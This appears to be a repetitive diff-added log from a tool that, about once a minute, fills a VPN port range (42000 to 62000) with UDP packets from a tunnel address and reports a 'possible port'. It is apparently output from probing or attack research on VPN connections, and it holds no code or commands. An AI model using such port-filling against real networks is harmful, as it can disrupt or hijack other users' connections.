+Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 16:01:06 +Starting port fill at 2020-09-06 16:02:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 16:02:05 +Starting port fill at 2020-09-06 16:03:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 16:03:04 +Starting port fill at 2020-09-06 16:04:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 16:04:04 +Starting port fill at 2020-09-06 16:05:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 16:05:06 +Starting port fill at 2020-09-06 16:06:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 16:06:05 +Starting port fill at 2020-09-06 16:07:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 16:07:07 +Starting port fill at 2020-09-06 16:08:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 16:08:06 +Starting port fill at 2020-09-06 16:09:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +Finished port fill at 2020-09-06 16:09:07 +Starting port fill at 2020-09-06 16:10:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 16:10:05 +Starting port fill at 2020-09-06 16:11:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 16:11:05 +Starting port fill at 2020-09-06 16:12:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 16:12:05 +Starting port fill at 2020-09-06 16:13:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 16:13:05 +Starting port fill at 2020-09-06 16:14:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 16:14:05 +Starting port fill at 2020-09-06 16:15:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 16:15:05 +Starting port fill at 2020-09-06 16:16:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 16:16:04 +Starting port fill at 2020-09-06 16:17:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 16:17:04 +Starting port fill at 2020-09-06 16:18:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 16:18:05 +Starting port fill at 2020-09-06 16:19:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 16:19:05 +Starting port fill at 2020-09-06 16:20:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 16:20:05 +Starting port fill at 2020-09-06 16:21:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 16:21:04 +Starting port fill at 2020-09-06 16:22:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +1 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +Filled up all those ports and finished at: 1 +Finished port fill at 2020-09-06 16:22:06 +Starting port fill at 2020-09-06 16:23:01 +Using tun src ip: 10.8.0.10 +Filling up vpn port range from 42000 to 62000.. +arc twas: 6~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +we server? : 0spreading the port range from 42000 to 62000 with udps.. +Sent w size 1000 to 43000 +Sent w size 1000 to 44000 +Sent w size 1000 to 45000 +Sent w size 1000 to 46000 +Sent w size 1000 to 47000 +Sent w size 1000 to 48000 +Sent w size 1000 to 49000 +Sent w size 1000 to 50000 +Sent w size 1000 to 51000 +Sent w size 1000 to 52000 +Sent w size 1000 to 53000 +Sent w size 1000 to 54000 +Sent w size 1000 to 55000 +Sent w size 1000 to 56000 +Sent w size 1000 to 57000 +Sent w size 1000 to 58000 +Sent w size 1000 to 59000 +Sent w size 1000 to 60000 +Sent w size 1000 to 61000 +Sent w size 1000 to 62000 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +finished phase 2 w possible port: 1 